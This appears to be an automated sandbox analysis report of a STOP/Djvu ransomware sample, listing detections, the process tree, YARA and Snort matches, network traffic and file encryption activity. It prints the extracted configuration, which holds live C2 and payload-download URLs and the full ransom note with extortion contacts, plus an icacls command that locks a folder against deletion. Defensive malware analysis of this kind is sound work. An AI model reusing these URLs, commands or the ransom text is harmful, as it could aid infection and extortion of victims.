Windows Analysis Report
bE5aaTiJM0.exe

Overview

General Information

Sample Name: bE5aaTiJM0.exe
Analysis ID: 679172
MD5: 5fae11a9ddb49452b6896fd3217e9665
SHA1: a642378099d0ac4e1dc3e0abe98b12bee1992e1d
SHA256: 12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b
Tags: exe Stop
Infos:

Detection

Djvu
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Found ransom note / readme
Yara detected Djvu Ransomware
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Machine Learning detection for sample
Modifies existing user documents (likely ransomware behavior)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses cacls to modify the permissions of files
Contains functionality to launch a program with higher privileges
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to query network adapater information
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • bE5aaTiJM0.exe (PID: 4004 cmdline: "C:\Users\user\Desktop\bE5aaTiJM0.exe" MD5: 5FAE11A9DDB49452B6896FD3217E9665)
    • bE5aaTiJM0.exe (PID: 5720 cmdline: "C:\Users\user\Desktop\bE5aaTiJM0.exe" MD5: 5FAE11A9DDB49452B6896FD3217E9665)
      • icacls.exe (PID: 1284 cmdline: icacls "C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe" /deny *S-1-1-0:(OI)(CI)(DE,DC) MD5: FF0D1D4317A44C951240FAE75075D501)
      • bE5aaTiJM0.exe (PID: 5592 cmdline: "C:\Users\user\Desktop\bE5aaTiJM0.exe" --Admin IsNotAutoStart IsNotTask MD5: 5FAE11A9DDB49452B6896FD3217E9665)
        • bE5aaTiJM0.exe (PID: 3616 cmdline: "C:\Users\user\Desktop\bE5aaTiJM0.exe" --Admin IsNotAutoStart IsNotTask MD5: 5FAE11A9DDB49452B6896FD3217E9665)
  • bE5aaTiJM0.exe (PID: 4376 cmdline: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe --Task MD5: 5FAE11A9DDB49452B6896FD3217E9665)
    • bE5aaTiJM0.exe (PID: 3920 cmdline: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe --Task MD5: 5FAE11A9DDB49452B6896FD3217E9665)
  • bE5aaTiJM0.exe (PID: 5828 cmdline: "C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe" --AutoStart MD5: 5FAE11A9DDB49452B6896FD3217E9665)
    • bE5aaTiJM0.exe (PID: 5832 cmdline: "C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe" --AutoStart MD5: 5FAE11A9DDB49452B6896FD3217E9665)
  • bE5aaTiJM0.exe (PID: 3304 cmdline: "C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe" --AutoStart MD5: 5FAE11A9DDB49452B6896FD3217E9665)
    • bE5aaTiJM0.exe (PID: 2888 cmdline: "C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe" --AutoStart MD5: 5FAE11A9DDB49452B6896FD3217E9665)
  • cleanup
{"Download URLs": ["http://rgyui.top/dl/build2.exe", "http://acacaca.org/files/1/build3.exe"], "C2 url": "http://acacaca.org/test2/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", 
"C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Windows\\", "F:\\PerfLogs\\", "F:\\ProgramData\\Desktop\\", "F:\\ProgramData\\Microsoft\\", "F:\\Users\\Public\\", "F:\\$Recycle.Bin\\", "F:\\$WINDOWS.~BT\\", "F:\\dell\\", "F:\\Intel\\"], "Public Key": "-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwX6oUNb4mk19lyNBxK80\\\\nWDzdQgJ9XMg2LdYk3Hm0F0zP2rWDuKVpyAbosbOzGKbJOkVa\\/1XbytFAm8RYfkB\\/\\\\nnfEgGh5OGcw\\/CcqqOL3R4Vpd7slLVXc56FLkTWEMSShzg1sNxgIiQm8VcaXOgUk8\\\\ntvWKcUIV9ujXmn5UBSy\\/ICDPveI3QCaxZod7kIBwZzszO\\/3CvNwAy3eejgJ6j8ie\\\\nmwJ9pjskzLjmq92yhDGUQygWfGw0tL1KtSiqUy2M7KNdmD4FX1aVeutZC9bggvn8\\\\nV4ksJChvMxI521ms58donyKjwBAbKXBfVRaXUV2k34bI0NQqhLz5OeGIRhn67oe+\\\\njwIDAQAB\\\\n-----END PUBLIC KEY-----"}
Source | Rule | Description | Author | Strings
00000007.00000002.409352563.00000000027E4000.00000040.00000800.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown
  • 0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000000C.00000000.443455238.0000000000400000.00000040.00000400.00020000.00000000.sdmp | SUSP_XORed_URL_in_EXE | Detects an XORed URL in an executable | Florian Roth
  • 0xe23ea:$s1: http://
  • 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
  • 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
  • 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
  • 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
  • 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF
  • 0xe23ea:$f1: http://
0000000C.00000000.443455238.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Djvu | Yara detected Djvu Ransomware | Joe Security
    0000000C.00000000.443455238.0000000000400000.00000040.00000400.00020000.00000000.sdmp | MALWARE_Win_STOP | Detects STOP ransomware | ditekSHen
    • 0xffe88:$x1: C:\SystemID\PersonalID.txt
    • 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC)
    • 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\
    • 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\
    • 0x1002ec:$s1: " --AutoStart
    • 0x100300:$s1: " --AutoStart
    • 0x103f48:$s2: --ForNetRes
    • 0x103f10:$s3: --Admin
    • 0x104390:$s4: %username%
    • 0x1044b4:$s5: ?pid=
    • 0x1044c0:$s6: &first=true
    • 0x1044d8:$s6: &first=false
    • 0x1003f4:$s7: delself.bat
    • 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
    • 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
    • 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
    0000000C.00000000.443455238.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Windows_Ransomware_Stop_1e8d48ff | unknown | unknown
    • 0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
    • 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
    Source | Rule | Description | Author | Strings
    11.0.bE5aaTiJM0.exe.400000.5.raw.unpack | Windows_Ransomware_Stop_1e8d48ff | unknown | unknown
    • 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
    9.0.bE5aaTiJM0.exe.400000.5.raw.unpack | Windows_Ransomware_Stop_1e8d48ff | unknown | unknown
    • 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
    9.2.bE5aaTiJM0.exe.400000.0.unpack | SUSP_XORed_URL_in_EXE | Detects an XORed URL in an executable | Florian Roth
    • 0xe0dea:$s1: http://
    • 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
    • 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
    • 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
    • 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
    • 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF
    • 0xe0dea:$f1: http://
    9.2.bE5aaTiJM0.exe.400000.0.unpack | JoeSecurity_Djvu | Yara detected Djvu Ransomware | Joe Security
      9.2.bE5aaTiJM0.exe.400000.0.unpack | MALWARE_Win_STOP | Detects STOP ransomware | ditekSHen
      • 0xfe888:$x1: C:\SystemID\PersonalID.txt
      • 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC)
      • 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\
      • 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\
      • 0xfecec:$s1: " --AutoStart
      • 0xfed00:$s1: " --AutoStart
      • 0x102948:$s2: --ForNetRes
      • 0x102910:$s3: --Admin
      • 0x102d90:$s4: %username%
      • 0x102eb4:$s5: ?pid=
      • 0x102ec0:$s6: &first=true
      • 0x102ed8:$s6: &first=false
      • 0xfedf4:$s7: delself.bat
      • 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
      • 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
      • 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
      No Sigma rule has matched
      Timestamp: 08/05/22-11:22:58.893846
      Source IP: 192.168.2.6
      Destination IP: 58.235.189.192
      SID: 2833438
      Source Port: 49782
      Destination Port: 80
      Protocol: TCP
      Classtype: A Network Trojan was detected

      Timestamp: 08/05/22-11:22:59.718335
      Source IP: 58.235.189.192
      Destination IP: 192.168.2.6
      SID: 2036335
      Source Port: 80
      Destination Port: 49782
      Protocol: TCP
      Classtype: A Network Trojan was detected

      AV Detection

      Source: bE5aaTiJM0.exe Virustotal: Detection: 39%
      Source: bE5aaTiJM0.exe ReversingLabs: Detection: 53%
      Source: http://acacaca.org/test2/get.php Avira URL Cloud: Label: malware
      Source: http://acacaca.org/test2/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4 Avira URL Cloud: Label: malware
      Source: acacaca.org Virustotal: Detection: 17%
      Source: http://acacaca.org/test2/get.php Virustotal: Detection: 18%
      Source: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe ReversingLabs: Detection: 53%
      Source: bE5aaTiJM0.exe Joe Sandbox ML: detected
      Source: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe Joe Sandbox ML: detected
      Source: 2.0.bE5aaTiJM0.exe.400000.6.unpack Malware Configuration Extractor: Djvu
      Source: C:\Users\user\Desktop\bE5aaTiJM0.exe Code function: 2_2_0040EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext
      Source: C:\Users\user\Desktop\bE5aaTiJM0.exe Code function: 2_2_00410FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext
      Source: bE5aaTiJM0.exe, 0000000C.00000003.618061651.00000000008E3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: -----BEGIN PUBLIC KEY-----
      Source: bE5aaTiJM0.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe File created: C:\_readme.txt
      Source: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe File created: C:\Users\user\_readme.txt
      Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.6:49766 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.6:49767 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.6:49768 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.6:49780 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.6:49781 version: TLS 1.2
      Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: bE5aaTiJM0.exe
      Source: Binary string: C:\xat\100\fahunisu_kuxuse\wuce97-sibemudex.pdb source: bE5aaTiJM0.exe, bE5aaTiJM0.exe.2.dr
      Source: Binary string: AC:\xat\100\fahunisu_kuxuse\wuce97-sibemudex.pdb` source: bE5aaTiJM0.exe, bE5aaTiJM0.exe.2.dr
      Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: bE5aaTiJM0.exe
      Source: C:\Users\user\Desktop\bE5aaTiJM0.exe Code function: 2_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose

      Networking

      Source: Traffic Snort IDS: 2833438 ETPRO TROJAN STOP Ransomware CnC Activity 192.168.2.6:49782 -> 58.235.189.192:80
      Source: Traffic Snort IDS: 2036335 ET TROJAN Win32/Filecoder.STOP Variant Public Key Download 58.235.189.192:80 -> 192.168.2.6:49782
      Source: Malware configuration extractor URLs: http://acacaca.org/test2/get.php
      Source: Joe Sandbox View ASN Name: SKB-ASSKBroadbandCoLtdKR
      Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: Joe Sandbox View IP Address: 162.0.217.254
      Source: Joe Sandbox View IP Address: 58.235.189.192
      Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49766
      Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49781
      Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49780
      Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 443
      Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 443
      Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 443
      Source: unknown Network traffic detected: HTTP traffic on port 49781 -> 443
      Source: unknown Network traffic detected: HTTP traffic on port 49768 -> 443
      Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49768
      Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49767
      Source: bE5aaTiJM0.exe, 0000000C.00000003.540809343.00000000033C0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: URL=http://www.facebook.com/ equals www.facebook.com (Facebook)
      Source: bE5aaTiJM0.exe, 0000000C.00000003.545804124.00000000033C0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: URL=http://www.twitter.com/ equals www.twitter.com (Twitter)
      Source: bE5aaTiJM0.exe, 0000000C.00000003.547069468.00000000033C0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: URL=http://www.youtube.com/ equals www.youtube.com (Youtube)
      Source: bE5aaTiJM0.exe, 0000000C.00000002.619149998.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000C.00000003.618033363.00000000008DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://acacaca.org/test2/get.php
      Source: bE5aaTiJM0.exe, 0000000C.00000003.617951064.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000C.00000002.619149998.00000000008A2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://acacaca.org/test2/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4
      Source: bE5aaTiJM0.exe, 0000000B.00000002.436291517.00000000007BD000.00000004.00000020.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000B.00000003.435286392.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000C.00000003.617951064.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000C.00000002.619149998.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000010.00000002.448461853.0000000000808000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: bE5aaTiJM0.exe String found in binary or memory: http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error
      Source: bE5aaTiJM0.exe, 0000000C.00000003.538674983.00000000033C0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.amazon.com/
      Source: bE5aaTiJM0.exe, 0000000C.00000003.542183889.00000000033C0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.google.com/
      Source: bE5aaTiJM0.exe, 0000000C.00000003.543541001.00000000033C0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.live.com/
      Source: bE5aaTiJM0.exe, 0000000C.00000003.544406916.00000000033C0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.nytimes.com/
      Source: bE5aaTiJM0.exe, 00000010.00000002.448009707.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://www.openssl.org/support/faq.html
      Source: bE5aaTiJM0.exe, 0000000C.00000003.545161091.00000000033C0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.reddit.com/
      Source: bE5aaTiJM0.exe, 0000000C.00000003.545804124.00000000033C0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.twitter.com/
      Source: bE5aaTiJM0.exe, 0000000C.00000003.546297954.00000000033C0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.wikipedia.com/
      Source: bE5aaTiJM0.exe, 0000000C.00000003.547069468.00000000033C0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.youtube.com/
      Source: bE5aaTiJM0.exe, 00000010.00000002.448461853.0000000000808000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/
      Source: bE5aaTiJM0.exe, 0000000C.00000003.617951064.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000C.00000002.619149998.00000000008A2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/A
      Source: bE5aaTiJM0.exe, 0000000B.00000002.436291517.00000000007BD000.00000004.00000020.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000B.00000003.435286392.00000000007BC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/S
      Source: bE5aaTiJM0.exe, 0000000B.00000002.436291517.00000000007BD000.00000004.00000020.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000B.00000003.435286392.00000000007BC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/U
      Source: bE5aaTiJM0.exe String found in binary or memory: https://api.2ip.ua/geo.json
      Source: bE5aaTiJM0.exe, 00000010.00000002.448461853.0000000000808000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonG
      Source: bE5aaTiJM0.exe, 0000000B.00000002.436250212.00000000007A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonJ
      Source: bE5aaTiJM0.exe, 0000000B.00000002.436219532.0000000000778000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsondllZ
      Source: bE5aaTiJM0.exe, 0000000B.00000002.436250212.00000000007A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonj
      Source: bE5aaTiJM0.exe, 0000000C.00000003.617923119.0000000000909000.00000004.00000020.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000C.00000002.619591429.0000000000909000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://we.tl/t-QsoSRIeA
      Source: bE5aaTiJM0.exe, 0000000C.00000002.619614591.0000000000914000.00000004.00000020.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000C.00000002.619400903.00000000008F1000.00000004.00000020.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000C.00000003.618130988.00000000008F1000.00000004.00000020.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000C.00000003.617889344.00000000008F5000.00000004.00000020.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000C.00000003.617644288.0000000000914000.00000004.00000020.00020000.00000000.sdmp, _readme.txt.12.dr, _readme.txt0.12.drString found in binary or memory: https://we.tl/t-QsoSRIeAK6
      Source: unknownDNS traffic detected: queries for: api.2ip.ua
      Source: C:\Users\user\Desktop\bE5aaTiJM0.exeCode function: 2_2_0040CF10 _memset,InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,2_2_0040CF10
      Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
      Source: global traffic HTTP traffic detected: GET /test2/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4 HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: acacaca.org
      Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.6:49766 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.6:49767 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.6:49768 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.6:49780 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.6:49781 version: TLS 1.2

      Spam, unwanted Advertisements and Ransom Demands

      Source: C:\_readme.txt Dropped file: ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-QsoSRIeAK6 Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@bestyourmail.ch Reserve e-mail address to contact us: datarestorehelp@airmail.cc Your personal ID: 0531Jhyjd0kP6vOoEdBm9p2ITHS3ppg85iRBRKnEdtqfNfpPA
      Source: Yara match File source: 9.2.bE5aaTiJM0.exe.400000.0.unpack, type: UNPACKEDPE
      Source: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe File moved: C:\Users\user\Desktop\BNAGMGSPLO.docx
      Source: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe File deleted: C:\Users\user\Desktop\BNAGMGSPLO.docx
      Source: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe File moved: C:\Users\user\Desktop\EWZCVGNOWT.mp3
      Source: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe File deleted: C:\Users\user\Desktop\EWZCVGNOWT.mp3
      Source: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe File moved: C:\Users\user\Desktop\TQDFJHPUIU.png

      System Summary

      Source: 11.0.bE5aaTiJM0.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
      Source: 9.0.bE5aaTiJM0.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
      Source: 9.2.bE5aaTiJM0.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
      Source: 9.2.bE5aaTiJM0.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
      Source: 9.0.bE5aaTiJM0.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
      Source: 9.0.bE5aaTiJM0.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
      Source: 9.0.bE5aaTiJM0.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
      Source: 12.0.bE5aaTiJM0.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
      Source: 12.0.bE5aaTiJM0.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
      Source: 9.0.bE5aaTiJM0.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
